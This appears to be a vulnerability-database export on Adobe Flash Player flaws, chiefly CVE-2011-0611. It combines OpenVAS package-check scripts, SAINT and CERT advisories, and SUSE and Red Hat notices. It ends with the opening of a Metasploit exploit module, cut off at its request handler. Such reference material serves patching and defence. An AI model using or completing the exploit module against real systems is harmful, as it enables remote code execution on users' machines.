See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple vulnerabilities in Adobe Flash Player might allow remote\n attackers to execute arbitrary code or cause a Denial of Service.\";\ntag_solution = \"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-10.3.183.10'\n \n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-11\nhttp://bugs.gentoo.org/show_bug.cgi?id=354207\nhttp://bugs.gentoo.org/show_bug.cgi?id=359019\nhttp://bugs.gentoo.org/show_bug.cgi?id=363179\nhttp://bugs.gentoo.org/show_bug.cgi?id=367031\nhttp://bugs.gentoo.org/show_bug.cgi?id=370215\nhttp://bugs.gentoo.org/show_bug.cgi?id=372899\nhttp://bugs.gentoo.org/show_bug.cgi?id=378637\nhttp://bugs.gentoo.org/show_bug.cgi?id=384017\nhttp://www.adobe.com/support/security/advisories/apsa11-01.html\nhttp://www.adobe.com/support/security/advisories/apsa11-02.html\nhttp://www.adobe.com/support/security/bulletins/apsb11-02.html\nhttp://www.adobe.com/support/security/bulletins/apsb11-12.html\nhttp://www.adobe.com/support/security/bulletins/apsb11-13.html\nhttps://www.adobe.com/support/security/bulletins/apsb11-21.html\nhttps://www.adobe.com/support/security/bulletins/apsb11-26.html\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 201110-11.\";\n\n \n \nif(description)\n{\n script_id(70774);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0558\", \"CVE-2011-0559\", \"CVE-2011-0560\", \"CVE-2011-0561\", \"CVE-2011-0571\", \"CVE-2011-0572\", \"CVE-2011-0573\", \"CVE-2011-0574\", 
\"CVE-2011-0575\", \"CVE-2011-0577\", \"CVE-2011-0578\", \"CVE-2011-0579\", \"CVE-2011-0589\", \"CVE-2011-0607\", \"CVE-2011-0608\", \"CVE-2011-0609\", \"CVE-2011-0611\", \"CVE-2011-0618\", \"CVE-2011-0619\", \"CVE-2011-0620\", \"CVE-2011-0621\", \"CVE-2011-0622\", \"CVE-2011-0623\", \"CVE-2011-0624\", \"CVE-2011-0625\", \"CVE-2011-0626\", \"CVE-2011-0627\", \"CVE-2011-0628\", \"CVE-2011-2107\", \"CVE-2011-2110\", \"CVE-2011-2135\", \"CVE-2011-2125\", \"CVE-2011-2130\", \"CVE-2011-2134\", \"CVE-2011-2136\", \"CVE-2011-2137\", \"CVE-2011-2138\", \"CVE-2011-2139\", \"CVE-2011-2140\", \"CVE-2011-2414\", \"CVE-2011-2415\", \"CVE-2011-2416\", \"CVE-2011-2417\", \"CVE-2011-2424\", \"CVE-2011-2425\", \"CVE-2011-2426\", \"CVE-2011-2427\", \"CVE-2011-2428\", \"CVE-2011-2429\", \"CVE-2011-2430\", \"CVE-2011-2444\");\n script_version(\"$Revision: 6593 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:18:14 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:39 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 10.3.183.10\"), vulnerable: make_list(\"lt 10.3.183.10\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2428", "CVE-2011-2444", "CVE-2011-2416", "CVE-2011-0622", "CVE-2011-0626", "CVE-2011-0627", "CVE-2011-0619", "CVE-2011-2140", "CVE-2011-0623", "CVE-2011-0609", "CVE-2011-2424", "CVE-2011-0625", "CVE-2011-2134", "CVE-2011-2138", "CVE-2011-0628", "CVE-2011-2139", "CVE-2011-0572", "CVE-2011-0573", "CVE-2011-2429", "CVE-2011-0558", "CVE-2011-0608", "CVE-2011-0574", "CVE-2011-2425", "CVE-2011-2110", "CVE-2011-0560", "CVE-2011-0577", "CVE-2011-2414", "CVE-2011-0611", "CVE-2011-0618", "CVE-2011-0561", "CVE-2011-2130", "CVE-2011-2137", "CVE-2011-0578", "CVE-2011-2417", "CVE-2011-2135", "CVE-2011-0579", "CVE-2011-2125", "CVE-2011-0571", "CVE-2011-2426", "CVE-2011-0575", "CVE-2011-2107", "CVE-2011-0559", "CVE-2011-2136", "CVE-2011-0624", "CVE-2011-0607", "CVE-2011-2415", "CVE-2011-0589", "CVE-2011-0621", "CVE-2011-2427", "CVE-2011-2430", "CVE-2011-0620"], "description": "The remote host is missing updates 
announced in\nadvisory GLSA 201110-11.", "modified": "2018-10-12T00:00:00", "published": "2012-02-12T00:00:00", "id": "OPENVAS:136141256231070774", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070774", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa_201110_11.nasl 11859 2018-10-12 08:53:01Z cfischer $\n#\n# Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70774\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2011-0558\", \"CVE-2011-0559\", \"CVE-2011-0560\", \"CVE-2011-0561\", \"CVE-2011-0571\", \"CVE-2011-0572\", \"CVE-2011-0573\", \"CVE-2011-0574\", \"CVE-2011-0575\", \"CVE-2011-0577\", \"CVE-2011-0578\", \"CVE-2011-0579\", \"CVE-2011-0589\", \"CVE-2011-0607\", \"CVE-2011-0608\", \"CVE-2011-0609\", \"CVE-2011-0611\", \"CVE-2011-0618\", \"CVE-2011-0619\", \"CVE-2011-0620\", \"CVE-2011-0621\", \"CVE-2011-0622\", \"CVE-2011-0623\", \"CVE-2011-0624\", \"CVE-2011-0625\", \"CVE-2011-0626\", \"CVE-2011-0627\", \"CVE-2011-0628\", \"CVE-2011-2107\", \"CVE-2011-2110\", \"CVE-2011-2135\", \"CVE-2011-2125\", \"CVE-2011-2130\", \"CVE-2011-2134\", \"CVE-2011-2136\", \"CVE-2011-2137\", \"CVE-2011-2138\", \"CVE-2011-2139\", \"CVE-2011-2140\", \"CVE-2011-2414\", \"CVE-2011-2415\", \"CVE-2011-2416\", \"CVE-2011-2417\", \"CVE-2011-2424\", \"CVE-2011-2425\", \"CVE-2011-2426\", \"CVE-2011-2427\", \"CVE-2011-2428\", \"CVE-2011-2429\", \"CVE-2011-2430\", \"CVE-2011-2444\");\n script_version(\"$Revision: 11859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-12 10:53:01 +0200 (Fri, 12 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-12 10:04:39 -0500 (Sun, 12 Feb 2012)\");\n script_name(\"Gentoo Security Advisory GLSA 201110-11 (Adobe Flash Player)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Adobe Flash Player might allow remote\n attackers to execute arbitrary code or cause a Denial of Service.\");\n script_tag(name:\"solution\", value:\"All Adobe Flash Player users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-10.3.183.10'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201110-11\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=354207\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=359019\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=363179\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=367031\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=370215\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=372899\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=378637\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=384017\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-01.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa11-02.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-02.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-12.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb11-13.html\");\n script_xref(name:\"URL\", 
value:\"https://www.adobe.com/support/security/bulletins/apsb11-21.html\");\n script_xref(name:\"URL\", value:\"https://www.adobe.com/support/security/bulletins/apsb11-26.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201110-11.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"www-plugins/adobe-flash\", unaffected: make_list(\"ge 10.3.183.10\"), vulnerable: make_list(\"lt 10.3.183.10\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "description": "Added: 04/21/2011 \nCVE: [CVE-2011-0611](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611>) \nBID: [47314](<http://www.securityfocus.com/bid/47314>) \nOSVDB: [71686](<http://www.osvdb.org/71686>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when the browser loads a specially crafted Small Web Format (SWF) file. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.2.153.2 for Windows or higher. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa11-02.html> \n<http://secunia.com/advisories/44119/> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.2.153.1. The targeted user must open the exploit file in Internet Explorer 7. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2011-04-21T00:00:00", "published": "2011-04-21T00:00:00", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/flash_callmethod_bytecode", "id": "SAINT:D1E10A87E683A65C65EF800D90A66751", "type": "saint", "title": "Adobe Flash Player callMethod Bytecode Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "description": "Added: 04/21/2011 \nCVE: [CVE-2011-0611](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611>) \nBID: [47314](<http://www.securityfocus.com/bid/47314>) \nOSVDB: [71686](<http://www.osvdb.org/71686>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when the browser loads a specially crafted Small Web Format (SWF) file. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.2.153.2 for Windows or higher. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa11-02.html> \n<http://secunia.com/advisories/44119/> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.2.153.1. The targeted user must open the exploit file in Internet Explorer 7. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2011-04-21T00:00:00", "published": "2011-04-21T00:00:00", "id": "SAINT:37227B38CBD904922BB3BD8CB235215F", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/flash_callmethod_bytecode", "title": "Adobe Flash Player callMethod Bytecode Memory Corruption", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:50", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "edition": 2, "description": "Added: 04/21/2011 \nCVE: [CVE-2011-0611](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611>) \nBID: [47314](<http://www.securityfocus.com/bid/47314>) \nOSVDB: [71686](<http://www.osvdb.org/71686>) \n\n\n### Background\n\n[Adobe Flash Player](<http://www.adobe.com/products/flashplayer/>) is a cross-platform browser plug-in providing visual enhancements for web pages. \n\n### Problem\n\nA memory corruption vulnerability allows command execution when the browser loads a specially crafted Small Web Format (SWF) file. \n\n### Resolution\n\n[Upgrade](<http://get.adobe.com/flashplayer/>) to Adobe Flash Player 10.2.153.2 for Windows or higher. \n\n### References\n\n<http://www.adobe.com/support/security/advisories/apsa11-02.html> \n<http://secunia.com/advisories/44119/> \n\n\n### Limitations\n\nExploit works on Adobe Systems Flash Player 10.2.153.1. The targeted user must open the exploit file in Internet Explorer 7. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-04-21T00:00:00", "published": "2011-04-21T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/flash_callmethod_bytecode", "id": "SAINT:75531313EF0C522E1ADBAD17BC07C016", "type": "saint", "title": "Adobe Flash Player callMethod Bytecode Memory Corruption", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:42:02", "bulletinFamily": "info", "cvelist": ["CVE-2011-0611"], "description": "### Overview \n\nAdobe Flash contains a vulnerability that can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nThe following versions of Adobe Flash contain an unspecified vulnerability that can result in memory corruption:\n\n * Adobe Flash Player 10.2.153.1 and earlier versions for Windows, Macintosh, Linux and Solaris operating systems\n * Adobe Flash Player 10.2.154.25 and earlier for Google Chrome users\n * Adobe Flash Player 10.2.156.11 and earlier for Android\n * The Authplay.dll component that ships with Adobe Reader and Acrobat X (10.0.2) and earlier 10.x and 9.x versions for Windows and Macintosh operating systems.\nThis vulnerability is being actively exploited in the wild. Exploit code for this vulnerability is publicly available as well. \n \nAny application that supports Flash or provides its own runtime may be vulnerable. Updating Flash Player does not update the Flash runtime included in those products. Note that separate instances of Flash are provided in a variety of Adobe products, including Adobe Reader and Acrobat. Adobe states that Adobe Reader 9.x for UNIX, Adobe Reader for Android, and Adobe Reader and Acrobat 8.x are not affected by this issue. 
\n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), PDF file, Microsoft Office document, or any other document that supports embedded SWF content, an attacker may be able to execute arbitrary code. \n \n--- \n \n### Solution \n\n**Apply an update** \nThis issue is addressed in Adobe Flash Player 10.2.159.1. Please see Adobe Security bulletin [APSB11-07](<http://www.adobe.com/support/security/bulletins/apsb11-07.html>) for more details. Adobe Reader 9.4.4 and Reader X 10.0.3 provide an updated Flash runtime to address this issue. Please see Adobe Security Bulletin [APSB11-08](<http://www.adobe.com/support/security/bulletins/apsb11-08.html>) for more details. Please also consider the following workarounds to mitigate this and other Flash vulnerabilities: \n \n--- \n \n**Use the Microsoft Enhanced Mitigation Experience Toolkit**\n\n \nThe [Microsoft Enhanced Mitigation Experience Toolkit](<http://www.microsoft.com/downloads/en/details.aspx?FamilyID=c6f0a6ee-05ac-4eb6-acd0-362559fd2f04>) (EMET) can be used to help prevent exploitation of this and other vulnerabilities. Additional information can be found in the [Microsoft Security Research & Defense blog](<http://blogs.technet.com/b/srd/archive/2011/03/17/blocking-exploit-attempts-of-the-recent-flash-0-day.aspx>). Additional workarounds include: \n \n**Disable Flash in your web browser** \n \nDisable Flash or selectively enable Flash content as described in [Securing Your Web Browser](<http://www.us-cert.gov/reading_room/securing_browser/>). \n \n**Disable Flash and 3D & Multimedia support in Adobe Reader 9 and later** \n \nFlash and 3D & Multimedia support are implemented as plug-in libraries in Adobe Reader. Disabling Flash in Adobe Reader will only mitigate attacks that use an SWF embedded in a PDF file. 
Disabling 3D & Multimedia support does not directly address the vulnerability, but it does provide additional mitigation and results not in a crash but in a more user-friendly error message. \n \nTo disable Flash and 3D & Multimedia support in Adobe Reader 9 on Microsoft Windows, delete or rename these files: \n \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\authplay.dll\"` \n`\"%ProgramFiles%\\Adobe\\Reader 9.0\\Reader\\rt3d.dll\"` \nFor Apple Mac OS X, delete or rename these files: \n \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/AuthPlayLib.bundle\"` \n`\"/Applications/Adobe Reader 9/Adobe Reader.app/Contents/Frameworks/Adobe3D.framework\"` \nFor GNU/Linux, delete or rename these files (locations may vary among distributions): \n \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/libauthplay.so\"` \n`\"/opt/Adobe/Reader9/Reader/intellinux/lib/librt3d.so\"` \n**NOTE:** Adobe states that this particular vulnerability does not affect the authplay component supplied with Reader for Linux. The steps listed above are being provided for users who wish to proactively disable the 3D and multimedia support in the version of Reader for Linux. \nFor versions of Adobe Reader newer than 9, please adjust the above file paths accordingly. File locations may be different for Adobe Acrobat or other Adobe products that include Flash and 3D & Multimedia support. Disabling these plug-ins will reduce functionality and will not protect against SWF files hosted on websites. Depending on the update schedule for products other than Flash Player, consider leaving Flash and 3D & Multimedia support disabled unless they are absolutely required. \n \n**Remove Flash** \n \nAdobe has provided a [TechNote](<http://kb2.adobe.com/cps/141/tn_14157.html>) with utilities for uninstalling the Flash Player plug-in and ActiveX control on Windows and Mac OS X systems. Removing these components can mitigate the web browser attack vector for this vulnerability. 
Note that this will not remove the instances of Flash Player that are installed with Adobe Reader or other Adobe products. \n \n**Disable JavaScript in Adobe Reader and Acrobat** \n \nDisabling JavaScript can help mitigate some techniques that use Adobe Reader as an attack vector. \n \nTo disable JavaScript in Adobe Reader:\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `JavaScript` section.\n 5. Uncheck the `Enable Acrobat JavaScript` checkbox.\nDisabling JavaScript will not resolve the vulnerabilities, it will only disable the vulnerable JavaScript component. When JavaScript is disabled, Adobe Reader and Acrobat prompt to re-enable JavaScript when opening a PDF that contains JavaScript. \n \n**Prevent Internet Explorer from automatically opening PDF documents** \n \nThe installer for Adobe Reader and Acrobat configures Internet Explorer to automatically open PDF files without any user interaction. This behavior can be reverted to the safer option of prompting the user by importing the following as a .REG file: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CLASSES_ROOT\\AcroExch.Document.7]` \n`\"EditFlags\"=hex:00,00,00,00` \n**Disable the displaying of PDF documents in the web browser** \n \nPreventing PDF documents from opening inside a web browser reduces the attack surface. If this workaround is applied to updated versions of Adobe Reader and Acrobat, it may protect against future vulnerabilities. \n \nTo prevent PDF documents from automatically opening in a web browser with Adobe Reader:\n\n 1. Open Adobe Acrobat Reader.\n 2. Open the `Edit` menu.\n 3. Choose the `Preferences...` option.\n 4. Choose the `Internet` section.\n 5. Uncheck the `Display PDF in browser` checkbox.\n**Enable DEP in Microsoft Windows** \n \nConsider enabling Data Execution Prevention (DEP) in supported versions of Windows. 
DEP should not be treated as a complete workaround, but it can mitigate the execution of attacker-supplied code in some cases. Microsoft has published detailed technical information about DEP in Security Research & Defense blog posts \"Understanding DEP as a mitigation technology\" [part 1](<http://blogs.technet.com/srd/archive/2009/06/05/understanding-dep-as-a-mitigation-technology-part-1.aspx>) and [part 2](<http://blogs.technet.com/srd/archive/2009/06/12/understanding-dep-as-a-mitigation-technology-part-2.aspx>). DEP should be used in conjunction with the application of patches or other mitigations described in this document. \n--- \n \n### Vendor Information\n\n230057\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Adobe Affected\n\nUpdated: April 21, 2011 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://www.adobe.com/support/security/bulletins/apsb11-07.html>\n * <http://www.adobe.com/support/security/bulletins/apsb11-08.html>\n * <http://www.adobe.com/support/security/advisories/apsa11-02.html>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://www.adobe.com/support/security/bulletins/apsb11-07.html>\n * <http://www.adobe.com/support/security/bulletins/apsb11-08.html>\n * <http://www.adobe.com/support/security/advisories/apsa11-02.html>\n * <http://www.microsoft.com/downloads/en/details.aspx?FamilyID=c6f0a6ee-05ac-4eb6-acd0-362559fd2f04>\n * <http://blogs.technet.com/b/srd/archive/2011/03/17/blocking-exploit-attempts-of-the-recent-flash-0-day.aspx>\n\n### Acknowledgements\n\nThanks 
to Adobe for reporting this vulnerability.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2011-0611](<http://web.nvd.nist.gov/vuln/detail/CVE-2011-0611>) \n---|--- \n**Severity Metric:** | 46.47 \n**Date Public:** | 2011-04-11 \n**Date First Published:** | 2011-04-12 \n**Date Last Updated:** | 2011-04-21 19:37 UTC \n**Document Revision:** | 17 \n", "modified": "2011-04-21T19:37:00", "published": "2011-04-12T00:00:00", "id": "VU:230057", "href": "https://www.kb.cert.org/vuls/id/230057", "type": "cert", "title": "Adobe Flash Player contains unspecified code execution vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:05:28", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0611"], "edition": 1, "description": "Specially crafted Flash files as delivered by web sites or as .swf-files could exploit the flash player to execute arbitrary code with the privileges of the user viewing these files. CVE-2011-0611 has been assigned to this issue.\n#### Solution\nIf supported by the browser, you can disable the flash plugin.", "modified": "2011-04-18T16:33:38", "published": "2011-04-18T16:33:38", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-04/msg00004.html", "id": "SUSE-SA:2011:018", "title": "remote code execution in flash-player", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:37", "bulletinFamily": "unix", "cvelist": ["CVE-2011-0611"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes one vulnerability in Adobe Flash Player. This\nvulnerability is detailed on the Adobe security page APSB11-07, listed in\nthe References section. 
Specially-crafted SWF content could cause\nflash-plugin to crash or, potentially, execute arbitrary code.\n(CVE-2011-0611)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 10.2.159.1.\n", "modified": "2018-06-07T09:04:29", "published": "2011-04-18T04:00:00", "id": "RHSA-2011:0451", "href": "https://access.redhat.com/errata/RHSA-2011:0451", "type": "redhat", "title": "(RHSA-2011:0451) Critical: flash-plugin security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T07:21:31", "description": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability. CVE-2011-0611. Remote exploit for windows platform", "published": "2011-04-16T00:00:00", "type": "exploitdb", "title": "Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0611"], "modified": "2011-04-16T00:00:00", "id": "EDB-ID:17175", "href": "https://www.exploit-db.com/exploits/17175/", "sourceData": "##\r\n# $Id: adobe_flashplayer_flash10o.rb 12330 2011-04-16 02:09:33Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => \"Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability\",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in Adobe Flash Player that was discovered, and\r\n\t\t\t\thas been exploited actively in the wild. 
By embedding a specially crafted .swf file,\r\n\t\t\t\tAdobe Flash crashes due to an invalid use of an object type, which allows attackers to\r\n\t\t\t\toverwrite a pointer in memory, and results arbitrary code execution.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => \"$Revision: 12330 $\",\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'sinn3r',\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2011-0611' ],\r\n\t\t\t\t\t[ 'OSVDB', '71686' ],\r\n\t\t\t\t\t[ 'BID', '47314' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb11-07.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2011/04/12/analysis-of-the-cve-2011-0611-adobe-flash-player-vulnerability-exploitation.aspx' ],\r\n\t\t\t\t\t[ 'URL', 'http://contagiodump.blogspot.com/2011/04/apr-8-cve-2011-0611-flash-player-zero.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://bugix-security.blogspot.com/2011/04/cve-2011-0611-adobe-flash-zero-day.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://secunia.com/blog/210' ],\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => \"process\",\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f',\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'IE 6/7 on Windows XP SP3 and Windows Vista', {} ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => \"Apr 11 2011\",\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tagent = 